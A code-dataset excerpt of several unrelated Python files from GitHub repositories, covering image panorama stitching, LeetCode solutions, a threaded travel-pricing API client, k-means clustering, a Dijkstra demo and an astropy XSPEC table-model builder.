canvas_crd_corners[-1, :])[0:2, :]\n \n limits_all.append(canvas_crd_corners.T)\n \n # Limits of the current warped image \n min_crd_canvas_cur = np.amin(canvas_crd_corners.T, axis=0) # min_x, min_y\n max_crd_canvas_cur = np.amax(canvas_crd_corners.T, axis=0) # max_x, max_y\n \n # Update the limits of the output image \n min_crd_canvas = np.floor(np.minimum(min_crd_canvas_cur, min_crd_canvas)) # min_x, min_y\n max_crd_canvas = np.ceil(np.maximum(max_crd_canvas_cur, max_crd_canvas)) # max_x, max_y\n \n # Compute output image size \n min_x = min_crd_canvas[0]\n max_x = max_crd_canvas[0]\n min_y = min_crd_canvas[1]\n max_y = max_crd_canvas[1]\n \n width_canvas = max_x - min_x + 1\n height_canvas = max_y - min_y + 1\n \n # output image array initialized to all black pixels\n canvas_img = np.zeros((int(height_canvas), int(width_canvas), 3), dtype=np.int64)\n \n # Compute offset of the upper-left corner of the reference image relative\n # to the upper-left corner of the output image\n offset = min_crd_canvas.astype(np.int64) # [x_offset, y_offset]\n \n # Find limits of panorama\n lims = np.concatenate(limits_all,axis=0)\n \n for i in range(int(lims.shape[0]/4)):\n lims_i = np.concatenate((lims[4*i:4 + 4*i], lims[None, 4*i, :]), axis = 0)\n plt.plot(lims_i[:, 0], -lims_i[:,1])\n\n plt.show()\n\n return canvas_img, offset\n\n\n# In[11]:\n\n\ndef image_warping(panorama_height, panorama_width, offset, H, img):\n \"\"\"\n Function that warps every input image on to the panorama, using inverse warping\n to map each pixel in the output image into the planes defined by the source images. 
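Inverse warping solves x_src = H^-1 x_dst for every destination pixel (via np.linalg.solve below), so each output pixel receives a colour sampled from the source image.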
\n If forward warping was used to map every pixel from each source image, there will \n be holes (i.e., some pixels in the output image will not be assigned an RGB \n value from any source image, and remain black) in the final output image.\n \"\"\"\n \n x_offset = -offset[0]\n y_offset = -offset[1]\n \n # Create a list of all pixels' coordinates in output image\n x,y = np.meshgrid(range(panorama_width), range(panorama_height))\n \n # Create homogeneous coordinates for each pixel in output image, considering \n # the translation offset vector \n x_coords = x.flatten().reshape(1,-1) - x_offset\n y_coords = y.flatten().reshape(1,-1) - y_offset\n \n grid_coords = np.concatenate((x_coords, y_coords, np.ones((1, x_coords.shape[1]))))\n \n # Perform inverse warp to compute coordinates in current input image\n image_coords = np.linalg.solve(H, grid_coords)\n \n # To get the warped coordinates, we must divide the first and second coordinates by \n # z to obtain the new x and y (euclidean coordinates)\n z = image_coords[None, 2, :] \n warp_coords = image_coords[0:2, :]/np.concatenate((z,z))\n \n # Reshape the pixel grid to have the same size as the panorama \n x_warp = np.reshape(warp_coords[None, 0, :], (panorama_height, panorama_width))\n y_warp = np.reshape(warp_coords[None, 1, :], (panorama_height, panorama_width))\n # Note: Some values will return as NaN (\"not a number\") because they\n # map to points outside the domain of the input image\n \n # Warped Image array that will contain RGB color maps obtained through inverse \n # mapping \n I_WarpColorMaps = np.zeros((panorama_height, panorama_width, 3))\n \n # Color interpolation, by sampling a color value for each pixel in source image. \n # By doing this we won't have any black pixels or gaps in the warped image, \n # (a kind of undersampling artifact)\n \n for channel in range(3):\n # When mapping pixel locations, some pixels in the output warped image will not \n # map to a pixel in a given source image because the output pixel’s coordinates \n # map outside the domain of the source image. For solving this, we use bilinear \n # interpolation (order = 1) for assigning the color value in the warped image\n \n I_WarpColorMaps[:, :, channel] = scipy.ndimage.map_coordinates(img[:, :, channel].astype(float), [y_warp, x_warp], order = 1)\n \n # color pixel warping, by converting I_WarpColorMaps into an unsigned 8-bit integer, \n # with the elements of an uint8 ranging from 0 to 255\n warped_image = I_WarpColorMaps.astype('uint8')\n\n return warped_image\n\n\n# In[12]:\n\n\ndef alpha_channel(img, epsilon=0.001):\n \"\"\"\n Function that computes the alpha channel of an RGB image.\n\n Args:\n img is an RGB image. \n\n epsilon (float): value to guarantee that the alpha channel has non-zero\n values, otherwise a division-by-zero error will be encountered \n when performing blending \n \n Returns:\n im_alpha has the same size as im_input. 
Its intensity is between\n epsilon and 1, inclusive.\n \"\"\"\n \n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # binary image that has 1s within the warped image and 0s beyond the edges of \n # the warped image \n im_bw = cv2.threshold(img_gray, 0.5, 255, cv2.THRESH_BINARY)[1]\n \n # alpha channel where the value of alpha for the input image is 1 at its \n # center pixel and decreases linearly to epsilon at all the border pixels\n im_alpha = scipy.ndimage.distance_transform_edt(im_bw)\n \n # normalize the distances to be in the interval [epsilon, 1].\n im_alpha = (im_alpha+epsilon)/np.max(im_alpha) \n \n return im_alpha\n\n\n# In[16]:\n\n\ndef blending(img1, img2):\n \"\"\"\n Function that blends two warped images together, overlapping pixel color values. \n The simplest way to create a final composite is by averaging the pixel values \n where the two images overlap, or by using the pixel values from one of the \n images.\n Simple averaging usually does not work very well, since exposure differences, \n misregistrations, and scene movement are all very visible. \n A better approach than averaging is to weight pixels near the center of the \n image more heavily and to down-weight pixels near the edges, this being \n encoded into an alpha channel. \n This is called feathering (Section 9.3.2 in the Szeliski book).\n\n Each pixel (x, y) in image Ii is represented as \n Ii(x, y) = (αi*R, αi*G, αi*B, αi) where (R,G,B) are the color values at the \n pixel and αi its alpha channel \n \n Pixel value of (x, y) in the stitched output image is computed as:\n [(α1*R, α1*G, α1*B) + (α2*R, α2*G, α2*B)] / (α1+α2).\n\n Args:\n img1 and img2 are both RGB images of the same size, having \n been warped to the same coordinate frame \n \n Output:\n im_blended has the same size and data type as the input images\n\n \"\"\"\n \n if feathering:\n # alpha channel that contains weights for blending the images \n alpha1 = alpha_channel(img1)\n alpha2 = alpha_channel(img2)\n \n im_blended = np.zeros(img1.shape)\n \n red_blending = (alpha1 * img1[:, :, 0] + alpha2 * img2[:,:,0])/(alpha1 + alpha2)\n green_blending = (alpha1 * img1[:, :, 1] + alpha2 * img2[:,:,1])/(alpha1 + alpha2)\n blue_blending = (alpha1 * img1[:, :, 2] + alpha2 * img2[:,:,2])/(alpha1 + alpha2)\n \n im_blended[:,:,0] = red_blending \n im_blended[:,:,1] = green_blending \n im_blended[:,:,2] = blue_blending\n \n # convert into an unsigned 8-bit integer, for the values of each channel to\n # range from 0 to 255\n im_blended = im_blended.astype('uint8')\n \n else:\n # average blending \n \n mask_a = cv2.cvtColor(img1, cv2.COLOR_RGB2GRAY)\n mask_b = cv2.cvtColor(img2, cv2.COLOR_RGB2GRAY)\n \n a_and_b = cv2.bitwise_and(mask_a, mask_b)\n overlap_area_mask = cv2.threshold(a_and_b, 1, 255, cv2.THRESH_BINARY)[1]\n \n overlap_pixels = (cv2.bitwise_and(img1, img1, mask = overlap_area_mask.astype('uint8')) + cv2.bitwise_and(img2, img2, mask = overlap_area_mask.astype('uint8')))/2\n \n im_blended = cv2.bitwise_and(img1, img1, mask = np.logical_not(overlap_area_mask).astype('uint8')) + cv2.bitwise_and(img2, img2, mask = np.logical_not(overlap_area_mask).astype('uint8')) + overlap_pixels\n \n im_blended = im_blended.astype('uint8')\n \n return im_blended\n\n\n# In[13]:\n\n\ndef pivproject2022_task2_plus(ref_image, path_to_input_folder, path_to_output_folder, extract_sift, subsampling, cv2WarpPerspective, feathering):\n \"\"\"\n Compute the homographies between images in a directory and a reference image\n\n ref_image: integer with index number of the frame 
that will be the reference \n image. First image is index=1. Ideally, the one in the middle of the sequence \n of input images, so that there is less distortion in the resulting mosaic.\n \n path_to_input_folder: string with the path to the input folder, where input images \n and keypoints are stored. Images are named rgb_number.jpg \n (or rgb_number.png) and corresponding keypoints are named \n rgbsift_number.mat\n\n \n path_to_output_folder: string with the path where homographies with respect to the reference\n image are stored\n\n \"\"\"\n \n # Check if path_to_input_folder was passed. If not, \"No_path\" is assigned\n if not('path_to_input_folder' in locals()):\n path_to_input_folder = \"No_path\"\n \n # Check if output directory exists. If not, output directory is created \n if not(os.path.isdir(path_to_output_folder)):\n os.mkdir(path_to_output_folder)\n \n # Get input rgb images\n rgb_paths = []\n sift_paths = []\n \n for im_path in glob.glob(path_to_input_folder+'/*.jpg'):\n rgb_paths.append(im_path)\n \n if len(rgb_paths) == 0:\n print('ERROR: In the specified path there aren\'t image input files')\n return \n \n else: \n #Ordering the rgb_paths array, in such a way that consecutive frames follow \n #each other \n image_paths = sorted(rgb_paths) \n \n if not(extract_sift):\n print('Searching for sift .mat files')\n \n for im_path in glob.glob(path_to_input_folder+'/*.mat'):\n sift_paths.append(im_path)\n \n if len(sift_paths) != 0:\n \n sift_paths_ordered = sorted(sift_paths)\n \n else:\n extract_sift = True\n print('In the specified path there aren\'t sift input files. Thus, a sift function will be used to extract matching points')\n\n # Get Reference image\n try: \n reference_image = img.imread(image_paths[ref_image - 1])\n \n except:\n print('ERROR: The index for the reference image is out of bounds. Please select an index between 1 and %d' % (len(rgb_paths)))\n return\n \n H_all = {}\n \n # compute homography matrices between adjacent input images. Homography matrices \n # between adjacent input images are then stored in a cell array H_all.\n \n for i in range(len(image_paths)-1):\n image_1_path = image_paths[i]\n image_2_path = image_paths[i+1]\n \n print(\"Processing {} & {}\".format(image_1_path, image_2_path))\n \n image_1 = img.imread(image_1_path)\n image_2 = img.imread(image_2_path)\n \n if extract_sift:\n sift_path1 = None\n sift_path2 = None\n \n else:\n sift_path1 = sift_paths_ordered[i]\n sift_path2 = sift_paths_ordered[i+1]\n \n key = 'H{}{}'.format(i, i+1)\n \n #try:\n # coordinates of the matches between image and template\n m_coords_img, m_coords_temp = siftMatch(image_1, image_2, sift_path2, sift_path1, N = 4)\n match_coords = np.append(m_coords_img, m_coords_temp, axis = 1)\n #except:\n # print('ERROR: check format of directory, as OpenCV only accepts ASCII characters for image paths')\n # return \n \n try:\n threshold_error = 4\n \n H_all[key] = GetHomographyRANSAC(match_coords)\n \n except: \n print('ERROR: RANSAC failed to compute homography. 
Check if there are enough matching keypoints.')\n \n \n # Compute new homographies H_map that map every other image *directly* to\n # the reference image \n H_map = compute_H_wrt_reference(H_all, ref_image)\n \n \n H_warp = {} # cell array that will contain the reasonable homographies between images and reference image, \n # so that only these images are warped \n \n ind_image_warp = [] # list that will contain the index of the images that will be warped \n \n for i in range(len(H_map)):\n key = \"H{}{}\".format(i, ref_image-1)\n H = H_map[key]\n \n print(\"image \"+str(i))\n print(\"np.linalg.det(H):\", np.linalg.det(H)) \n print(\"np.linalg.cond(H[0:2, 0:2]):\", np.linalg.cond(H[0:2, 0:2]))\n \n H = Check_Homography(H)\n\n if np.array_equal(H, np.zeros((3,3))):\n print(\"H{}{} is not reasonable\".format(i, ref_image-1))\n else:\n print(\"H{}{} is reasonable\".format(i, ref_image-1))\n H_warp[key] = H\n ind_image_warp.append(i)\n\n # saving homographies with respect to the reference image \n file_name = os.path.split(image_paths[i])[1]\n H_output_path = path_to_output_folder + '/' + 'H_' + file_name[4:8] + '.mat'\n scipy.io.savemat(H_output_path, {'H':H})\n \n canvas_img, offset = get_blank_canvas(H_warp, ind_image_warp, image_paths, ref_image)\n \n panorama_height, panorama_width, _ = canvas_img.shape\n \n # cell array that contains warped input images on the output canvas panorama \n warped_images = {}\n \n for i in range(len(H_warp)):\n ind_image = ind_image_warp[i]\n \n key = \"H{}{}\".format(ind_image, ref_image-1)\n H = H_warp[key]\n \n image = cv2.imread(image_paths[ind_image])\n \n if cv2WarpPerspective:\n # Combine homography with the translation offset vector \n translation_mat = np.array([[1, 0, -offset[0]], [0, 1, -offset[1]], [0, 0, 1]])\n H = np.dot(translation_mat, H)\n warped_images[i] = cv2.warpPerspective(image, H, (canvas_img.shape[1], canvas_img.shape[0]), flags = cv2.INTER_NEAREST)\n \n else:\n warped_images[i] = image_warping(panorama_height, panorama_width, offset, H, image)\n \n # Initialize output image to black (0)\n panorama_image = np.zeros((panorama_height, panorama_width,3))\n \n panorama_image = warped_images[0] \n \n for i in range(1,len(warped_images)):\n panorama_image = blending(np.float32(panorama_image), np.float32(warped_images[i]))\n \n plt.title(\"Panorama\")\n plt.imshow(panorama_image)\n plt.show()\n \n # saving mosaic\n image_output_path = path_to_output_folder + '/mosaic_' + str(ref_image) + '.png'\n cv2.imwrite(image_output_path, panorama_image)\n \n\n\n# In[14]:\n\n\nref_image = int(sys.argv[1])\npath_to_input_folder = sys.argv[2]\npath_to_output_folder = sys.argv[3]\n\nextract_sift = int(sys.argv[4]) # variable that defines if the extraction of sift keypoints and descriptors is to \n # be performed (set to 1, 0 otherwise)\n\nsubsampling = int(sys.argv[5]) # variable that defines if subsampling of the source image \n # descriptors is to be performed (set to 1, 0 otherwise), when \n # performing the matching \n \ncv2WarpPerspective = int(sys.argv[6]) # variable that defines if image warping is to be performed by \n # cv2WarpPerspective built-in function (set to 1) or a function \n # developed by the group (set to 0) \n\nfeathering = int(sys.argv[7]) # variable that defines if feathering is going to be performed (set to 1) or not \n # (set to 0) not for blending the warped images \n\n\n# In[48]:\n\n\npivproject2022_task2_plus(ref_image, path_to_input_folder, path_to_output_folder, extract_sift, subsampling, cv2WarpPerspective, 
feathering)\n\n","repo_name":"marianamourao-37/Image-Processing-and-Vision","sub_path":"panorama/pivproject2022_task2_plus.py","file_name":"pivproject2022_task2_plus.py","file_ext":"py","file_size_in_byte":33577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18952543255","text":"\"\"\"\nGiven an integer, write a function to determine if it is a power of two.\n\"\"\"\n\n# import math\n\n# def isPowerOfTwo(n):\n# return n > 0 and math.log2(n) % 1 == 0\n# print(isPowerOfTwo(64))\n\ndef isPowerOfTwo(n):\n i = 0\n while i < n:\n if n == pow(2, i):\n return True\n i += 1\n return False","repo_name":"sshantel/leetcode","sub_path":"231_power_of_two.py","file_name":"231_power_of_two.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18532661163","text":"def push_up(tree, rt):\n tree[rt] = tree[rt<<1] + tree[rt<<1 | 1]\n \n\ndef build(tree, data, l, r, rt):\n if l == r:\n tree[rt] = data[l]\n return\n m = (l+r)>>1\n build(tree, data, l, m, rt<<1)\n build(tree, data, m+1, r, rt<<1 | 1)\n push_up(tree, rt)\n \n\ndef get_idx(begin, end, pos):\n l = begin\n r = end\n rt = 1\n while l < r:\n m = (l+r) >> 1\n if pos > m:\n l = m+1\n rt = rt<<1 | 1\n else:\n r = m\n rt = rt<<1\n return rt\n\n\ndef query_iter(tree, l, r, lq, rq, rt):\n if (lq <= l and rq >= r):\n return tree[rt]\n m = (l+r)>>1\n ans = 0\n if (m >= lq):\n ans += query_iter(tree, l, m, lq, rq, rt<<1)\n if (m < rq):\n ans += query_iter(tree, m+1, r, lq, rq, rt<<1 | 1)\n return ans\n\n\nclass NumArray:\n\n def __init__(self, nums):\n \"\"\"\n :type nums: List[int]\n \"\"\"\n if nums:\n nums = [0] + nums\n self.tree = [0] * (len(nums)*4)\n self.length = len(nums)-1\n build(self.tree, nums, 1, len(nums)-1, 1)\n \n\n def update(self, i, val):\n \"\"\"\n :type i: int\n :type val: int\n :rtype: void\n \"\"\"\n rt = get_idx(1, self.length, i+1)\n self.tree[rt] = val\n p = rt >> 1\n while p:\n push_up(self.tree, p)\n p = p >> 1\n \n\n def sumRange(self, i, j):\n \"\"\"\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n return query_iter(self.tree, 1, self.length, i+1, j+1, 1)\n \n\n\n# Your NumArray object will be instantiated and called as such:\n# obj = NumArray(nums)\n# obj.update(i,val)\n# param_2 = obj.sumRange(i,j)\n","repo_name":"monlie/LeetCode","sub_path":"307.py","file_name":"307.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17155246745","text":"# load the dependancies\nfrom kaptiorestpython.client import KaptioClient\nfrom kaptiorestpython.utils_kaptio import load_kaptioconfig\nfrom utils import get_pickle_data, save_pickle_data, save_json, scanfiles, copy_pickles\nimport json\nfrom time import time\nfrom datetime import datetime\nfrom queue import Queue, Empty\nfrom threading import Thread\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass ThreadWorker(Thread):\n def __init__(self, kt, job_queue, result_queue, savepath):\n Thread.__init__(self)\n self.logger = logging.getLogger(__name__)\n self.kt = kt\n self.savepath = savepath\n self.job_queue = job_queue\n self.result_queue = result_queue\n\n def run(self):\n i = 0\n while True:\n # Get the work from the queue and expand the tuple\n p = self.job_queue.get()\n i += 1\n if i % 100 == 0:\n logger.info(\"Processing {}\".format(i))\n \n try:\n packageid = p.get('packageid')\n tax_profiles = 
p.get('tax_profiles')\n occupancy = p.get('occupancy')\n services = p.get('services')\n dates = p.get('dates')\n currency = p.get('currency', 'CAD')\n channelid = p.get(\"channelid\")\n\n data = self.kt.process_package_prices(\n savepath=self.savepath, \n packageid=packageid, \n dates=dates, \n tax_profiles=tax_profiles, \n occupancy=occupancy, \n services=services,\n currency=currency,\n channelid=channelid\n )\n\n #self.logger.info(data)\n \n p['pricelist'] = data\n self.result_queue.put(p)\n\n finally:\n self.job_queue.task_done() \n\ndef process_price_parallel(config, data, kt, savepath):\n if not data:\n data = {}\n\n job_queue = Queue()\n result_queue = Queue()\n\n package_field = 'packages'\n key_field = 'package_pricelist'\n\n logger.info(\"loading prices...\")\n\n reload = config.get('flags', {}).get('switches', {}).get('reload')\n currency=config.get(\"presets\", {}).get(\"currency\", \"CAD\")\n try:\n max_threads = int(config.get(\"presets\", {}).get(\"threads\", 5))\n except:\n max_threads = 5\n\n channelid=None\n for c in data.get(\"channels\",[]):\n if c.get(\"id\") == config.get(\"presets\", {}).get(\"channelid\") or \\\n c.get(\"name\") == config.get(\"presets\", {}).get(\"channelname\") or \\\n c.get(\"code\") == config.get(\"presets\", {}).get(\"channelcode\"):\n logger.info(\"Matched channeldata {} => {}\".format(c.get(\"name\"), c.get(\"id\")))\n channelid = c.get(\"id\")\n break\n \n if not channelid:\n logger.error(\"Failed to match channelid {}\".format(config.get(\"presets\", {}).get(\"channelid\")))\n raise Exception(\"Failed to match channelid {}\".format(config.get(\"presets\", {}).get(\"channelid\")))\n \n limit_run = int(config.get(\"presets\", {}).get(\"limit_run\",0))\n added = 0\n for p_value in data.get(package_field, []):\n #logger.info(\"p_value: {}\".format(p_value))\n if p_value.get(key_field, []):\n if not reload:\n continue\n p_key = p_value.get('id')\n\n if not p_value.get('active'):\n if not p_key in config.get('packages',[]): \n continue\n logger.info('\\tIncluding inactive package {}'.format(p_key))\n \n dates = []\n for d in p_value.get('package_dates', []):\n dates.append(d)\n\n if len(dates) == 0:\n for d in p_value.get('dates', []):\n dates.append(d)\n\n if len(dates) == 0:\n for d in p_value.get('package_departures', []):\n if d.get('active'):\n dates.append(d.get('date'))\n\n run_data = {\n \"packageid\": p_key,\n \"dates\": dates,\n \"tax_profiles\": data.get('tax_profiles', {}),\n \"occupancy\": data.get('occupancy', {}),\n \"services\": p_value.get('service_levels', {}),\n \"currency\": currency,\n \"channelid\": channelid\n }\n\n job_queue.put(run_data)\n if limit_run > 0:\n added += 1\n if added > limit_run:\n logger.info(\"Run limit hit: {}\".format(limit_run))\n break\n \n for _ in range(max_threads):\n worker = ThreadWorker(kt, job_queue, result_queue, savepath)\n # Setting daemon to True will let the main thread exit even though the workers are blocking\n worker.daemon = True\n worker.start()\n\n # now to wait for the results...\n logger.info(\"Queue loaded... waiting to finish processing\")\n job_queue.join()\n\n if not data.get('pricelist'):\n data['pricelist'] = {}\n\n # now to get the results\n logger.info(\"Process complete... 
reading data\")\n while True:\n # do stuff with job\n # Get the work from the queue and expand the tuple\n try:\n run_data = result_queue.get(False)\n packageid = run_data.get(\"packageid\")\n if not data.get('pricelist', {}).get(packageid):\n data['pricelist'][packageid] = {}\n \n data['pricelist'][packageid]['pricelist'] = run_data.get('pricelist')\n \n except Empty:\n break\n\n logger.info(\"Processed {} pricelist\".format(len(data.get('pricelist'))))\n\n return data","repo_name":"Dreffed/Kaptio_API","sub_path":"utils_parallel.py","file_name":"utils_parallel.py","file_ext":"py","file_size_in_byte":5696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18147259657","text":"import numpy as np\r\n\r\nclass KMeans(object):\r\n \"\"\"\r\n K均值实��\r\n \"\"\"\r\n def __init__(self,k) -> None:\r\n \"\"\"\r\n 参数:\r\n k (int): 分类数量\r\n \"\"\"\r\n self.k = k\r\n\r\n def fit(self, X):\r\n k = self.k\r\n size = X.shape[0]\r\n dim = X.shape[1]\r\n new_centers = np.zeros((k, dim))\r\n centers = np.zeros((k, dim))\r\n dis = np.zeros((size, k))\r\n y = np.zeros(size, dtype=np.int)\r\n \r\n # 随机初始点很重要\r\n for i in range(k):\r\n center_idx = np.random.randint(low=0, high=size, size=1)[0]\r\n centers[i] = X[center_idx]\r\n\r\n while True:\r\n for i in range(k):\r\n dis[:, i] = np.sum((X - centers[i])**2, axis=1)\r\n\r\n y = np.argmin(dis, axis=1)\r\n\r\n for i in range(k):\r\n choose_x = X[y == i]\r\n\r\n if choose_x.size != 0:\r\n new_centers[i] = np.mean(choose_x, axis=0)\r\n else:\r\n new_centers[i] = centers[i]\r\n\r\n gap = np.sum((centers - new_centers)**2)\r\n\r\n centers = new_centers\r\n\r\n if gap < 1e-6:\r\n break\r\n\r\n return centers, y\r\n\r\n\r\n def compute_err(self, centers, X, y):\r\n return np.mean(np.sum((X - centers[y])**2, axis=1))","repo_name":"WArewh/college","sub_path":"ai/foundation_technique/hw8/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43040804797","text":"#!/usr/bin/env python\n\"\"\"dijkstra.py: all_pairs_dijkstra_path demonstration\n\"\"\"\n\nimport networkx as nx\nfrom networkx.algorithms.connectivity.edge_augmentation import one_edge_augmentation\n#from networkx.algorithms.shortest_paths.weighted import all_pairs_dijkstra_path_length\n\n# Make a graph.\nG = nx.DiGraph()\n\n# Define edges with weights.\nG.add_weighted_edges_from(\n ((0, 1, 10.0),\n (0, 2, 14.0),\n (0, 3, 12.0),\n (1, 2, 8.0),\n (1, 4, 19.0),\n (2, 3, 7.0),\n (2, 5, 22.0),\n (3, 5, 21.0),\n (4, 5, 11.0),))\n\n# Compute the shortest path lengths between all nodes in graph G.\n\n# 全てのペアに対して最短距離を検索\nall_pairs = nx.all_pairs_dijkstra_path_length(G)\n\n# ターゲットとゴールを指定した1ペアに対して最短距離を検索\nshortest_pairs = nx.single_source_dijkstra(G, 0, 5)\n\n# all_pairsの使い方\nfor source, mapping in all_pairs:\n for target in mapping.keys():\n if source != target:\n dist = mapping[target]\n print(f\"({source}, {target}): {dist:4.1f}\")","repo_name":"batamorphism/coding","sub_path":"Python/重要な奴/ふるい/ダイクストラ.py","file_name":"ダイクストラ.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40015307907","text":"# Create XSPEC/Sherpa style table models\n#\n# Used in:\n#\n# You et al. (2015), ApJ submitted, arXiv:1506.03959\n# Adhikari et al. 
(2016), in preparation\n#\n# table_model\n# Create Xspec/Sherpa style table model\n#\n# read_userparams\n# Read model parameters from a file provided by the user\n#\n# get_paramval\n# Find combinations of model paramaters corresponding to the input\n# spectra\n#\n# read_input_spectra\n# Read grid of model spectra from a file prvided by the user\n\n\nfrom astropy.io import fits\nimport numpy as np\nimport os\n\ndef table_model(modelname, userparfile, specfile, outfile,\n clobber=False):\n \n# Create Xspec/Sherpa style table model\n#\n# :rtype: None, fits file created.\n#\n# :param modelname: name of the table model displayed in Xspec/Sherpa\n# :param userparfile: file with user keywords for the table model\n# :specfile: file with grid of energy spectra, 1st column: energy grid\n# in keV; consecutive columns: model spectra\n# :param outfile: name of the output fits file\n# :param clobber: T/F, if T outfile will be overwritten\n#\n# Tmp file 'tmp_tabmod.fits' created and removed.\n\n# ----------- READ IN USER INPUT --------------------\n\n if (os.path.isfile(outfile) and not clobber):\n raise NameError('Output file ' + outfile +\n ' exists and clobber set to false\\n')\n\n userdict = read_userparams(userparfile)\n \n # Convert userdict['value'] into a list of tuples; one tuple\n # for each model parameter\n\n # value_not_padded: used in get_paramval to calculate array with\n # combinations of model parameters\n idx = 0\n value_not_padded = []\n for item in userdict['numbvals']:\n value_not_padded.append(tuple(userdict['value'][idx:idx+item]))\n idx += item\n\n # value_padded: format required for col10 of the fits file\n value_padded = []\n maxnum = max(userdict['numbvals'])\n for val in value_not_padded:\n if (len(val) != maxnum):\n n = maxnum - len(val)\n value_padded.append(val + (0.,)*n)\n else:\n value_padded.append(val)\n\n # model energy grid (bin edges!)\n energy = np.loadtxt(specfile)[:,0] # energy in keV\n energ_lo = energy[:-1]\n energ_hi = energy[1:]\n\n paramval = get_paramval(value_not_padded)\n\n # list of tuples with spectra\n input_spectra = read_input_spectra(specfile, userdict['numbvals'])\n\n# ----------- END ---------------------------------\n\n # initialize fits file by creating user parameters extension\n\n col1 = fits.Column(name='NAME', format='12A',\n array=userdict['name'])\n col2 = fits.Column(name='METHOD', format='J',\n array=userdict['method'])\n col3 = fits.Column(name='INITIAL', format='E',\n array=userdict['initial'])\n col4 = fits.Column(name='DELTA', format='E',\n array=userdict['delta'])\n col5 = fits.Column(name='MINIMUM', format='E',\n array=userdict['minimum'])\n col6 = fits.Column(name='BOTTOM', format='E',\n array=userdict['bottom'])\n col7 = fits.Column(name='TOP', format='E',\n array=userdict['top'])\n col8 = fits.Column(name='MAXIMUM', format='E',\n array=userdict['maximum'])\n col9 = fits.Column(name='NUMBVALS', format='J',\n array=userdict['numbvals'])\n col10 = fits.Column(name='VALUE',\n format=np.str(np.max(userdict['numbvals']))+'E',\n array=value_padded)\n\n cols = fits.ColDefs([col1, col2, col3, col4, col5, col6, col7, col8,\n col9, col10])\n\n tbhdu = fits.BinTableHDU.from_columns(cols)\n\n # update header of user parameters extension\n\n nintparm = len(userdict['numbvals'])\n \n tbhdr = tbhdu.header\n\n tbhdr.set('EXTNAME', 'PARAMETERS',\n 'name of this binary table extension')\n tbhdr.set('HDUCLASS', 'OGIP',\n 'format conforms to OGIP standard')\n tbhdr.set('HDUCLAS1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n 
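# The header keywords written below (HDUCLAS2, HDUVERS1, NINTPARM, NADDPARM) follow the OGIP convention for XSPEC table models (OGIP memo 92-009).\n 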
tbhdr.set('HDUCLAS2', 'PARAMETERS',\n 'extension containing parameter info')\n tbhdr.set('HDUVERS1', '1.0.0',\n 'version of format')\n tbhdr.set('NINTPARM', nintparm,\n 'Number of interpolation parameters')\n tbhdr.set('NADDPARM', 0,\n 'Number of additional parameters')\n\n if (os.path.isfile('tmp_tabmod.fits')):\n os.remove('tmp_tabmod.fits')\n\n tbhdu.writeto('tmp_tabmod.fits')\n\n # update primary header\n\n hdulist = fits.open('tmp_tabmod.fits')\n\n prihdr = hdulist[0].header\n prihdr['bitpix'] = 16\n prihdr.set('modlname', modelname, 'model name')\n prihdr.set('modlunit', 'photons/cm^2/s', 'model units')\n prihdr.set('redshift', True,\n 'If true then redshift will be included as a par')\n prihdr.set('addmodel', userdict['addmodel'],\n 'If true then this is an additive table model')\n prihdr.set('hduclass', 'OGIP',\n 'format conforms to OGIP standard')\n prihdr.set('hduclas1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n prihdr.set('hduvers1', '1.0.0', 'version of format')\n\n if (os.path.isfile(outfile)):\n os.remove(outfile)\n\n hdulist.writeto(outfile)\n \n hdulist.close()\n os.remove('tmp_tabmod.fits')\n \n # append extension energies and update its header\n\n col1 = fits.Column(name='ENERG_LO', format='E', array=energ_lo,\n unit='keV')\n col2 = fits.Column(name='ENERG_HI', format='E', array=energ_hi,\n unit='keV')\n\n cols = fits.ColDefs([col1, col2])\n\n tbhdu_energies = fits.BinTableHDU.from_columns(cols)\n\n hdr = tbhdu_energies.header\n hdr.set('EXTNAME', 'ENERGIES',\n 'name of this binary table extension')\n hdr.set('HDUCLASS', 'OGIP',\n 'format conforms to OGIP standard')\n hdr.set('HDUCLAS1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n hdr.set('HDUCLAS2', 'ENERGIES',\n 'extension containing energy bins info')\n hdr.set('HDUVERS1', '1.0.0', 'version of format')\n\n fits.append(outfile, tbhdu_energies.data, hdr)\n\n # append extension spectra and update its header\n\n col1 = fits.Column(name='PARAMVAL',\n format=np.str(nintparm)+'E', array=paramval)\n col2 = fits.Column(name='INTPSPEC',\n format=np.str(len(energ_lo))+'E',\n array=input_spectra, unit='photons/cm^2/s')\n\n cols = fits.ColDefs([col1, col2])\n\n tbhdu_spectra = fits.BinTableHDU.from_columns(cols)\n\n hdr = tbhdu_spectra.header\n hdr.set('EXTNAME', 'SPECTRA',\n 'name of this binary table extension')\n hdr.set('HDUCLASS', 'OGIP',\n 'format conforms to OGIP standard')\n hdr.set('HDUCLAS1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n hdr.set('HDUCLAS2', 'MODEL SPECTRA',\n 'extension containing model spectra')\n hdr.set('HDUVERS1', '1.0.0', 'version of format')\n\n fits.append(outfile, tbhdu_spectra.data, hdr)\n \n return\n\n\ndef read_userparams(fname):\n# Read model parameters from the file\n#\n# :rtype: dictionary, required keyword : value\n# :param fname: name of the file containing required keywords and values\n\n # Build a dictonary with user input\n \n with open(fname, 'r') as f:\n # ignore empty lines\n lines = [ l for l in f.readlines() if l.strip() ]\n\n expected_no_lines = 11\n\n if (len(lines)!= expected_no_lines):\n raise NameError(fname + ': expected ' +\n np.str(expected_no_lines) + ' lines, but ' +\n np.str(len(lines)) + 